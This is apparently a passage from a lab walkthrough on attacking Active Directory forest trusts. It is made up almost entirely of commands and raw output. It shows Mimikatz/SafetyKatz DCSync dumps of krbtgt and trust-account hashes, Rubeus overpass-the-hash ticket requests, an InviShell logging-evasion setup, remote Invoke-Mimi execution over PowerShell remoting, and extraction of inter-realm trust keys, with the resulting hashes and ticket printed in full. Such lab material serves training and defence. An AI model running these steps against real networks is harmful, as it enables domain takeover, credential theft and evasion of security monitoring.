mimikatz(commandline) # exit
Bye!

C:\Windows\system32>klist

Current LogonId is 0:0x16159e5

Cached Tickets: (1)

#0> Client: Administrator @ dollarcorp.moneycorp.local

Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 7/4/2024 11:08:10 (local)
End Time: 7/2/2034 11:08:10 (local)
Renew Time: 7/2/2034 11:08:10 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:

C:\Windows\system32>"C:\AD\Tools\Old_Tools\SafetyKatz.exe" "lsadump::dcsync /user:mcorp\krbtgt

/domain:moneycorp.local" "exit"

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local

[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:46:24 PM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID : 502

Credentials:
Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf
lm - 0: 87836055143ad5a507de2aaeb9000361

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7c7a5135513110d108390ee6c322423f

* Primary:Kerberos-Newer-Keys *
Default Salt : MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e
aes128_hmac (4096) : 801bb69b81ef9283f280b97383288442
des_cbc_md5 (4096) : c20dc80d51f7abd9

* Primary:Kerberos *
Default Salt : MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : c20dc80d51f7abd9

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 49fec950691bbeba1b0d33d5a48d0293
02 0b0c4dbc527ee3154877e070d043cd0d
03 987346e7f810d2b616da385b0c2549ec
04 49fec950691bbeba1b0d33d5a48d0293
05 0b0c4dbc527ee3154877e070d043cd0d
06 333eda93ecfba8d60c57be7f59b14c62
07 49fec950691bbeba1b0d33d5a48d0293
08 cdf2b153a374773dc94ee74d14610428
09 cdf2b153a374773dc94ee74d14610428
10 a6687f8a2a0a6dfd7c054d63c0568e61
11 3cf736e35d2a54f1b0c3345005d3f962
12 cdf2b153a374773dc94ee74d14610428
13 50f935f7e1b88f89fba60ed23c8d115c
14 3cf736e35d2a54f1b0c3345005d3f962
15 06c616b2109569ddd69c8fc00c6a413c
16 06c616b2109569ddd69c8fc00c6a413c
17 179b9c2fd5a34cbb6013df534bf05726
18 5f217f838649436f34bbf13ccb127f44
19 3564c9de46ad690b83268cde43c21854
20 1caa9da91c85a1e176fb85cdefc57587
21 27b7de3c5a16e7629659152656022831
 22 27b7de3c5a16e7629659152656022831
23 65f5f95db76e43bd6c4ad216b7577604
24 026c59a45699b631621233cb38733174
25 026c59a45699b631621233cb38733174
26 342a52ec1d3b39d90af55460bcda72e8
27 ef1e1a688748f79d16e8e32318f51465
28 9e93ee8e0bcccb1451face3dba22cc69
29 480da975c1dfc76717a63edc6bb29d7b

mimikatz(commandline) # exit
Bye!
Cross Forest attacks
Getting the RC4 or AES hash of the trust key
Across forests where trust is established, the escalation from Enterprise admins of one forest to enterprise
admins of another forest is not possible, since the SID filtering removes all foreign SIDs from the user’s
Access Token while accessing a resource via a trust in a trusting domain. The resources with in a forest
which are explicitly shared with the other forest are only accessible.

DCSync attack
To obtain the inter-realm trust key, we can execute dc-sync attack. For executing dc-sync attack we need
domain administrator privileges.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : GI5URSM1
[*] Domain : 00IB0KZR
[*] Password : K6M9JFXY
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 5020
[+] LUID : 0x1cc4e7d

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 30166653
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGAjCCBf6gAwIBBaEDAgEWooIE2TCCBNVhggTRMIIEzaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BHUwggRxoAMCARKhAwIBAqKCBGMEggRf0fx4eE65IK7//xxOE0am9ciLPap0flfrAK6q3GVcjAbnvvrZ
vQIfAUrgaIiI6d9o0mNviBUi9dbSqwS7hAyQRVJHmCUxP8f8OjZfo4aZuNcubwM16ZV/Ea7BWkd17Y/z
RBHt1KFgfWGcIpvtlP2eoOpGEnwUEXLf+vpHxxbHx2/vQ9/zpB44c6tIgyJIex6nyhAVQGjyNqigK4If
XF4bt5mxLLBxshSXkODhqiv72zyZKGbankL7F9AlYIzqZlj138uPiakDfxywWHtxV2DHYD230DjiXL+m
PkvtRK5F1zP1mZ5Qlp5DgcchX7FZNBKJvDF8HacVZVN1qaoX0CN9IZ3ZLby6mOCEWwZ3e5chepZlehXR
p4OeKVFPjAAcH2kGeXS//e+5Uc9zlo8zMMxNyUuj86So49fvz4pF5JqgaKFoVxm+Sb28X99d+OENz5lF
 LIyQa4Xx3gpujXKXd44mYJVx7IU3/nqK3OAD3lHVz8cWl8u7AoYaXC7VZXN4AGENfWeX0bzg4ymHFAOq
eujGuEdOpRkVj4f9fyCtiEF+/raA3sV3GTxQtG+mTooqH4G6RBUjnzwXxLNG0foru7v5xrWwkZmSz13D
f4JCxezCOWsuquaMzZJANGMcj9ZdkZG17Fid5rpyw87jU7SHF9jcm9w5WYTaO/n25Q/bK6RSPjAZs9MK
GEnFTH6BJ+BPM/HQnbe+VZcUHY83OC+5FJs6rF11iT5pVxL6FCYTOiT6hMGvXSHcXSYpiEioNEqaTcYq
/W6kihazS0YSEbzh538Lh3+lhXiOKqk1Ys470l+PSLqzJntnakT1f1XHcAa33NAKxDdrSfa/9ciFaPaJ
48E5u4KL1rVRiopRB71GqgLkBVH/oYb8n7OUO/RVWno4o/9bjQRXzZ0Bi7O5iCR5jnfmeSw3Kg+YWTtt
UK2LaUk8NtEDJPeNTSw97U1ABNmzKMKtQWp6vbmqYEbK/RZ/ajmjw8uq5NbvY9A9WZdciS5a5nNKak5v
o7AMOdYPYPHgVZcp6IAoq04YB48vkvgTyKJUdCoGYJDDdpaZqlXfFGAK8hoNAeTn/do8gQ+dZXW8vbjL
/ZQ+wB45X0NltKSF9ZZxyUOzodO7yur92pAV1hdL9VyLH5YB6X5f4ejf5bhe2Sjgl9BKVZ6LRlhx7jWG
bU5WQbDE+n6fV/VSAV1jgXXXwET/SwbYFIMULWoDmBvC4LBWHtRce0Ano4G03QaPxOAwtbFPecg4ZuYk
CjKKOCOrMj9qZZe5yJGI/rQwgYC9WFddEXgmZXHzMdHegB24yTpeRkxzO+MnAQvJqFmlptIoNAt1tCxq
h1zh5BWDxKMFrLrd3s72E+jAj1d9mTzYG0beSjtflbE7vnnAw3uJ3IjGmA87Q3sDFn3Syg1v7ndhqFas
HLPFtPnAD69qf4Yc2hyP8umwYwlR92P/FCFqfLcDCFBzN72kSrN2mZ1RG9ND6M36nwqWR9TvZE1GH8wT
Wic5o4IBEzCCAQ+gAwIBAKKCAQYEggECfYH/MIH8oIH5MIH2MIHzoCswKaADAgESoSIEILgKQxyKHkin
Jl1lMcV1Vf79jOJT3/+LqCtCcyymj2ZnoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohUwE6AD
AgEBoQwwChsIc3ZjYWRtaW6jBwMFAEDhAAClERgPMjAyNDA3MDUwNzQxMTZaphEYDzIwMjQwNzA1MTc0
MTE2WqcRGA8yMDI0MDcxMjA3NDExNlqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMC
AQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FM
[*] Target LUID: 0x1cc4e7d
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/5/2024 12:41:16 AM
EndTime : 7/5/2024 10:41:16 AM
RenewTill : 7/12/2024 12:41:16 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : uApDHIoeSKcmXWUxxXVV/v2M4lPf/4uoK0JzLKaPZmc=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt with Domain Administrator privileges opens. We can now execute the DCSync
attack to get the Inter-Realm trust key.
C:\Windows\system32>"C:\AD\Tools\Old_tools\BetterSafetyKatz.exe" "lsadump::dcsync
/user:dcorp\ecorp$" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:dcorp\ecorp$

[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\ecorp$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : ecorp$

** SAM ACCOUNT **

SAM Username : ecorp$

Account Type : 30000002 ( TRUST_ACCOUNT )
User Account Control : 00000820 ( PASSWD_NOTREQD INTERDOMAIN_TRUST_ACCOUNT )
Account expiration :
Password last change : 7/4/2024 10:15:46 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-1112
Object Relative ID : 1112

Credentials:
Hash NTLM: feddedccad840cd0e5c912cb1f860b35
ntlm- 0: feddedccad840cd0e5c912cb1f860b35
ntlm- 1: 10b5b23f42f792c66e2277be14f4b55d
ntlm- 2: 7c36fa5f301d69efdbb07a1edf33c9df
ntlm- 3: ea80e49d365a24a147fcd1d6dc318fc0
ntlm- 4: 11c187ac7018a9beeb860c1cca54af06
ntlm- 5: 11c187ac7018a9beeb860c1cca54af06
ntlm- 6: e5bafd881e8e5d134e6c0994b4c25e86
ntlm- 7: 16f488bc4a807949cac214e2133fc2a7
ntlm- 8: 0e5dab89f76c6eee55bd4bb21c4d2c77
ntlm- 9: 629dc2d91bf1a947ac8bf549d11af2ef
ntlm-10: 629dc2d91bf1a947ac8bf549d11af2ef
ntlm-11: c385a63faf99a3683122c2a6cc1cdfca
ntlm-12: dda7fb5024ebd1559a54acd4f5a8a45e
ntlm-13: 660bc35992fd46489936d726a566ceaf
ntlm-14: f7656959be8e6a194a4328b87333fc10
ntlm-15: f7656959be8e6a194a4328b87333fc10
ntlm-16: b70359171eaba09b47b6628a96acd306
ntlm-17: b70359171eaba09b47b6628a96acd306
ntlm-18: b70359171eaba09b47b6628a96acd306
ntlm-19: e57174660d873322518eb638a7de1dc4
ntlm-20: 2e4c4f5f8430d2a911423e2a0ab1e638
ntlm-21: 2e4c4f5f8430d2a911423e2a0ab1e638
ntlm-22: 06a8dd8fce6bbff42f447692bfed66bc
ntlm-23: 8de42d81c52e69a4428aef2efdc7e21a
lm - 0: 790b0c87d488bc61ab0e1d4ea905c809
lm - 1: 63c6d76e01ce59a29a0c9ae0ec53cda3
lm - 2: 5a4bb9c62af1697cc8444e9f89c9de4c
lm - 3: 7499250d8c717e07f6c7dd0bcbc71e1b
lm - 4: db67c4fdcf62e08175512e4807bddd76
lm - 5: 057969b2ad1f70f45dc5a12e6f8b3cd6
lm - 6: ef45c06f41dce1cc69e6e829efa9329e
lm - 7: ea657e094e8f42b45c2a5e998485df9a
lm - 8: e12cc1998cbec556ebb3b43787352a3b
lm - 9: 0923ecd0651846f3ec22bc0bd89adfa1
lm -10: 5e11fe0aead285010c8e958c458473d8
lm -11: 7f9b2b0268231129cd2af20cd04d8324
lm -12: fee2907cec424667a075f09208e5665c
lm -13: cd147ebeceee38114a801b57ea8a3850
lm -14: cbd7ef426f508b6c364d5c963015de79
lm -15: f3caa3b36790c65eaee5d113165f3014
lm -16: d045cbb01832ea70efe0b707bf730ed2
lm -17: 782161a13017c66c8ad939588e837316
lm -18: 18321a190a2f0da7173ff74a2d257201
lm -19: 95bdf4eebd05a793c16aba601e6380d7
lm -20: f59a0a245f5d91de4d8e04341a5c3e27
lm -21: 06fe224d178befa31042256de47acd5d
 lm -22: 612d262ebcba540762f15adcb90eabeb
lm -23: 31835d3cadd55bd20b38e2e6f7ebd0d6

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgtecorp
Default Iterations : 4096
Credentials
aes256_hmac (4096) : e67aa9981db12e7e0dd8165a422b2009017f6c870b9b9f96b9e8105b82126b37
aes128_hmac (4096) : f69f70cbcc4501fc0abba42373c028c0
des_cbc_md5 (4096) : 3d917aa7cd2c3894
OldCredentials
aes256_hmac (4096) : 65cc8526de20b5d4234e4e9ed804de796fff3bb4c97b8203a88dce54194ae72e
aes128_hmac (4096) : da1a9669b38da36b85bada8443abf68d
des_cbc_md5 (4096) : 3d917aa7cd2c3894
OlderCredentials
aes256_hmac (4096) : bd60f2bf83382da26db5853b1478633097cab3cd5f0664e96265c321dc6fe1a7
aes128_hmac (4096) : ff5486c7084846aaf1162e9f5b8309d4
des_cbc_md5 (4096) : 3d917aa7cd2c3894

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgtecorp
Credentials
des_cbc_md5 : 3d917aa7cd2c3894
OldCredentials
des_cbc_md5 : 3d917aa7cd2c3894

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 c569d2848a566d18f74628891d927c97
02 cf67c08a2f143b09a3acfd8d63ee96cb
03 93d251c47edf12d5a6a21466270885d2
04 c569d2848a566d18f74628891d927c97
05 cf67c08a2f143b09a3acfd8d63ee96cb
06 451993486426f0cdf6800c610e356767
07 c569d2848a566d18f74628891d927c97
08 cd61215b6a1f99f9e95695a7cacee403
09 cd61215b6a1f99f9e95695a7cacee403
10 d8cec349aa9e57497825d81551decfda
11 aa57224de64e923acf6bdbb0b61af3dd
12 cd61215b6a1f99f9e95695a7cacee403
13 5e74ef0c5f032f26aa3b246415c9ca04
14 aa57224de64e923acf6bdbb0b61af3dd
15 1effaeb40dc0885b0ff45c3ea0c74035
16 1effaeb40dc0885b0ff45c3ea0c74035
17 6fb27f85c2e7e6ba0cc33749ec9dd68f
18 d1af13370003757866d45667874907e8
19 daf4b486a0d5cc756bc0cd7d91263e22
20 5e4c53291970854ae29da588da0e3981
21 7ef0be01ad83a12b1b94ce2bdad1bebf
22 7ef0be01ad83a12b1b94ce2bdad1bebf
23 a7101a39bbda962156013bb4761bdef7
24 1699d73ac432b2724f3798465ebdc101
25 1699d73ac432b2724f3798465ebdc101
26 aac15ecee7a8493f2f2bb78fcb2bafe8
27 fe7533dadc475eef83058e77db33c755
28 56ae9f95ce77a6e62e78b201a308fe56
 29 342cf49efa873980d47e59bfbb8f3ed4

mimikatz(commandline) # exit
Bye!

Invoke-Mimi
We can also get the Inter-Realm trust key using Invoke-Mimi.

lsadump::trust /patch
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -

ScriptBlock { $env:username;$env:computername }
svcadmin
DCORP-DC
PS C:\Windows\system32> $session = New-PSSession -ComputerName dcorp-
dc.dollarcorp.moneycorp.local
PS C:\Windows\system32> Invoke-Command -Session $session -FilePath C:\AD\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Enter-PSSession -Session $session
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"lsadump::trust /patch"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)

[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/13/2024 9:05:32 PM - CLEAR - 2a 89 1d fb 1f 4e c3 5f 53 b7 79 2a 8a f1 fc ad 7f 1d 22
a0 24 25 01 2d f0 2e dd cb c1 9c 65 3c 3d a9 ba 00 2f 78 d4 dd 71 9b de d0 ab 14 c2 49 ac e8 dc
b8 2f 51 dc d8 e6 98 f2 0b 29 2f 1a b9 93 9b e0 c5 63 22 cf 39 f0 1c f4 27 cc 14 92 15 20 74 9b
38 32 86 eb 21 9b 98 a1 9b 03 a8 59 3d af ca 3c 88 4e 17 cd b1 29 9a 2c 9a 11 3e af 44 dd aa 03
76 01 3a f6 1a c4 ca 61 ee df 41 08 61 21 0b 3a 79 99 aa 89 9c 4e ca 42 79 c8 85 2a a6 18 36 6b
18 94 63 ce df cc 58 ff 95 81 d3 e9 e1 48 4a 85 2d c2 61 0a cd 2c b9 1a 58 a6 9c 9a 7d e4 b4 27
32 c1 df ee 48 90 03 35 fe 77 e6 97 37 6a 75 91 10 45 bc 91 29 69 db 9c 00 5a 06 e0 31 fe 44 17
c4 09 ec 7a 39 ca 46 b3 0f 8f d0 e9 39 e6 8d 2c 02 be 6b bd 2c c5 4b 13 a9 9d 14 43 e0
* aes256_hmac 09e60c921003dd4b72c5fbd63cb52aac316ef305e797a5b9d837c5a6134b310a
 * aes128_hmac 7eea125ae826bb26dc8e273b6b8685b2
* rc4_hmac_nt a8f73b279dc7257c7a8a2d0c911043d2

[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 6/13/2024 9:01:43 PM - CLEAR - d9 10 c3 61 76 ff 36 ad e2 65 a8 d5 4e f3 84 92 b0 82 73
3d 5f 35 a0 ed 30 96 2d 39 64 c3 82 3b 16 0b af ae ae ff a4 77 05 2c f5 47 2a d6 77 a5 69 25 5a
a7 a7 e5 3f 4e 09 c7 e0 31 f4 e2 53 49 0e f2 e9 e3 1c 5a 7b d8 1d 06 9c 95 98 ea 38 2b 45 d3 76
be 15 d2 8b c3 31 38 06 fb ca 0f 36 c1 de b1 a2 df 3a 05 4e 14 e4 17 04 57 81 18 06 77 ef 6d da
bb e3 60 42 ce 53 d7 a4 31 31 d8 98 05 06 e4 5a af bb dc e4 5c ff f1 43 46 9a aa 08 90 4b 25 35
5e 5d 48 21 eb 44 f3 33 bc 4f 03 d5 fc 69 29 b7 de 2b ad 9c 1c 73 a0 cc a5 79 e5 91 13 b3 d3 af
c8 fa 92 cc 6f 13 2f a1 7d d1 28 de ef 96 90 8f 6d 14 36 25 0a 4c af 57 ae 51 5d 9a 8e 26 90 02
12 64 85 1b 28 9f 72 1c 49 b0 90 92 a0 b7 88 69 b7 96 87 bf 00 a4 a4 b2 35 fa 57 c7 8e
* aes256_hmac 574a1d8ebb609f51bb9028d6c47edd340c5076be83d1336f877e9fc209ffa637
* aes128_hmac c2b6e81c3d0b8e91df418a3a32d1132f
* rc4_hmac_nt 170847fffcf86c9d2dcc4c45cc734e2b

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL

* 5/3/2024 9:05:28 PM - CLEAR - 40 1f 1d 77 a1 92 53 70 df 55 ca 73 b4 c6 8c b7 c2 ed 76 f0
cd ac f9 82 f7 09 01 aa ad 62 62 a9 0a 81 a5 73 9d ff 02 dd 13 ce 65 74 5b 4a b9 ec 91 1d e7 bc
c3 45 93 05 79 a9 e7 58 9a a0 d0 46 2a 9d 33 1e 09 bb 51 a5 76 15 57 d0 db e0 5c 45 38 c7 93 57
b2 1d cf 14 c4 c7 48 f7 8d a7 53 31 12 4a 53 b6 45 a7 4c 9b 19 d5 c9 f6 e0 da 4f 01 d6 a1 6e 0b
2f 79 c2 49 95 61 81 da 67 d2 b6 7f ff 86 8a d8 5f 3a 99 49 62 be 6b 5a 31 29 b7 4e d4 2c a3 29
01 c7 94 86 8a 2c 5f 8e 76 f7 97 d3 7d c6 60 0a 66 9d 24 a5 9a 90 9b 3b 85 4a 89 b3 b0 6c e5 78
6a c2 08 27 e4 84 09 f9 f3 d9 f4 ec f6 35 f2 c2 9a 7b 4c 5d 7d 90 09 77 dd 60 6c 2b 06 01 0f d8
18 34 94 d7 4a a5 0f 5d 63 a4 7e a6 6a 14 f2 74 ba 75 1d 4d d0 36 fc ba 24 80 a8 6d
* aes256_hmac 55857d0270aa7dddf35db46932d75b53a8520c36ea3782ccd3403249e8f74786
* aes128_hmac a915717424b3d2b8630c55e5faf748e7
* rc4_hmac_nt 692acf0a13b6446ee4898339932172be

[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 6/13/2024 9:01:43 PM - CLEAR - b8 a3 df 9c 39 7f c3 9f b9 de 9d 68 85 9b 4b c3 bc ca 63
2e df fc b1 db 5d 1f 18 5d 3e 9d 15 2f b6 68 b9 a4 7f ea 29 88 de 6f b3 ac cb fc 22 01 bd c3 c9
88 f5 05 d2 35 41 50 6c b9 1d ff 86 ee 02 75 9f 00 25 33 5d 43 c6 fb d5 42 d0 74 31 27 42 49 35
20 af 04 fe 13 21 81 78 2c 63 0c 8f c9 c0 ce 8e 94 08 92 8c 48 4c 30 36 5a 11 20 f5 70 d3 d0 a5
fa 43 df 1b db 57 da 5f 62 56 d5 83 71 07 eb 96 ba cc 5b bf 5f 42 08 5d 9f 7a fb 99 de 8d 8e 62
25 9a 39 0c 7e d2 4d a2 e7 1d 05 45 d2 ca 76 86 29 ad 33 24 fb 00 28 02 a2 0b d7 27 c8 c2 26 2c
66 bb e3 16 5a 00 98 a6 42 21 0c 24 71 08 57 3d 85 15 a8 ea d4 e3 f1 db 65 81 a4 ea fe 80 a0 24
34 03 7e 52 1a d0 22 ef c9 da 89 10 60 9b ca 0d 5e c6 e2 15 02 a9 d3 3a 51 a6 3f 3d 51
* aes256_hmac ca5dc3eec2614f058b015bca83b1bd630f1ce43f9dc260e024f601a77a9f07fb
* aes128_hmac 8bf703993346b04723ae9267c7ca3593
* rc4_hmac_nt 757d0a697d2c7eaf3ea5137543430a22

Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)

[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 7/4/2024 10:15:48 PM - CLEAR - f1 35 9f f2 23 65 cc 38 ca 58 07 ba 63 77 8a 7f f9 22 5e
1d 44 60 f3 4f bb f7 6d 34
* aes256_hmac 959b6de34a906beaa60287501752c3e92bd2c023c1ede99c52cddc0cfcefe3d0
* aes128_hmac 20de3e8ffd6e7261fbe4377090b9518f
* rc4_hmac_nt b6180443e64c3dd466720bd52d6e34c8

[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 7/4/2024 10:15:48 PM - CLEAR - f1 35 9f f2 23 65 cc 38 ca 58 07 ba 63 77 8a 7f f9 22 5e
1d 44 60 f3 4f bb f7 6d 34
* aes256_hmac 4a8999f170c512287d3a38ae189979efec201c2284109044c41f101de16b2e04
* aes128_hmac c8ea862d96573709bd90422ed086e7a2
* rc4_hmac_nt b6180443e64c3dd466720bd52d6e34c8

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL

 * 7/4/2024 10:02:26 PM - CLEAR - 02 0b 6d a3 b1 07 75 3b 95 c6 25 bb ae c0 71 56 60 fb 62
19 7b 05 e8 c3 74 c8 fa 77
* aes256_hmac dc168477d9529968ead900a4dae204c9d0248efa31ffd9e194d8cc9a4a77b8eb
* aes128_hmac 88b33d5c90887e92dd813aba570cc339
* rc4_hmac_nt cb5e22c0feb4155f6ee613b166326023

[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 7/4/2024 10:02:26 PM - CLEAR - 02 0b 6d a3 b1 07 75 3b 95 c6 25 bb ae c0 71 56 60 fb 62
19 7b 05 e8 c3 74 c8 fa 77
* aes256_hmac 692420fb85e3f9b44f4afe16bc04372f7785be6ca171495eb92c0708bd6e1892
* aes128_hmac c14d8ecb6afe8ac90e9733ca45f04479
* rc4_hmac_nt cb5e22c0feb4155f6ee613b166326023

Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)

[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 7/4/2024 10:15:46 PM - CLEAR - 02 8e 95 d2 14 bd 34 4e 91 09 ba e6 94 82 36 c4 b9 e7 9b
68 42 95 ba a4 cc 95 ce 3c
* aes256_hmac bbaaba4dd07e4db16ac76cf9fdba00984894bd0a0591ae6c902bef7b8a6c3f78
* aes128_hmac c9884fa0dd0f0c3702db86ce4147570b
* rc4_hmac_nt feddedccad840cd0e5c912cb1f860b35

[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 7/4/2024 10:15:46 PM - CLEAR - 02 8e 95 d2 14 bd 34 4e 91 09 ba e6 94 82 36 c4 b9 e7 9b
68 42 95 ba a4 cc 95 ce 3c
* aes256_hmac fd4b5e51cebe2c14b7c55b3eb1d1b1e9d56957bf55fec8c10615846f37050604
* aes128_hmac fd944689405dd272bb04d5876be5d873
* rc4_hmac_nt feddedccad840cd0e5c912cb1f860b35

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL

* 7/4/2024 10:02:21 PM - CLEAR - b6 f5 d2 4c 42 22 3f 58 a2 e7 95 c4 bf c2 61 68 be 5b 7a
85 f3 b5 0a 07 f8 fd 29 29
* aes256_hmac d2fddfe77b5051a38ceae331d748ae084b95349d22f2e7965496ad683a3e3ee6
* aes128_hmac 681c0ef5125d2e6a8e72297e3903cea8
* rc4_hmac_nt 10b5b23f42f792c66e2277be14f4b55d

[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 7/4/2024 10:02:21 PM - CLEAR - b6 f5 d2 4c 42 22 3f 58 a2 e7 95 c4 bf c2 61 68 be 5b 7a
85 f3 b5 0a 07 f8 fd 29 29
